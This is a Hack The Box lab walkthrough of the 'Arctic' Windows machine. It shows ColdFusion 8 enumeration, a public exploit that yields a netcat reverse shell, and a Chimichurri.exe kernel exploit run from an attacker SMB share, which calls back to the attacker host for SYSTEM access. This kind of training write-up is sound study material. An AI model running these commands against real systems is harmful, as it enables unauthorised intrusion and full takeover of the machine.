Skip to content

Hack The Box | Arctic

In this walkthrough, we will be going through the Arctic box on Hack The Box.

Room Banner

Successfully Pwned Arctic

Completed and pwned this challenge on Hack The Box.

Owned

Hack The Box

Pwned

Machine Overview

The target machine runs a vulnerable ColdFusion 8 service exposed over HTTP (port 8500). Initial access is obtained through a known exploit for ColdFusion 8, and privilege escalation is achieved via a kernel exploit.

Enumeration

Nmap Scan

Started off with an Nmap scan to find open ports and services:

bash
nmap -sC -sV -A -oN arctic.nmap 10.10.10.11

Results:

bash
PORT     STATE SERVICE    VERSION
135/tcp  open
8500/tcp open

Checking Out the Web Service

Going to http://10.10.10.11:8500/ shows a directory listing:

Directory Listing

From there, we find this path:

url
/CFIDE/adminapi/administrator.cfc

It takes us to a login page for the ColdFusion admin panel:

ColdFusion Login

Getting a Shell (Initial Access)

The service on port 8500 is Adobe ColdFusion 8, which has some known vulnerabilities.

A quick Google search for “ColdFusion 8 exploit” led to this:

Running the Exploit

We used the Python exploit to get a shell:

bash
python 50057.py

Set up a Netcat listener:

bash
nc -lnvp 4444

Shell comes back as the tolis user:

bash
C:\ColdFusion8\runtime\bin> whoami  
arctic\tolis

Privilege Escalation (tolis → root)

System Info

Checked system info to look for possible privilege escalation paths:

bash
systeminfo

Key details:

bash
OS Name:                   Microsoft Windows Server 2008 R2 Standard
OS Version:                6.1.7600 N/A Build 7600

This version is vulnerable to MS10-059 and other kernel exploits.

Running the Exploit

Copied the payload to the target from an SMB share:

bash
\\10.10.14.2\smb-share\Chimichurri.exe 10.10.14.2 5555

Listener setup:

bash
nc -lnvp 5555

Now we’ve got SYSTEM access:

bash
C:\ColdFusion8\runtime\bin> whoami  
nt authority\system

User & Root Flags

  • User: C:\Users\tolis\Desktop\user.txt
  • Root: C:\Users\Administrator\Desktop\root.txt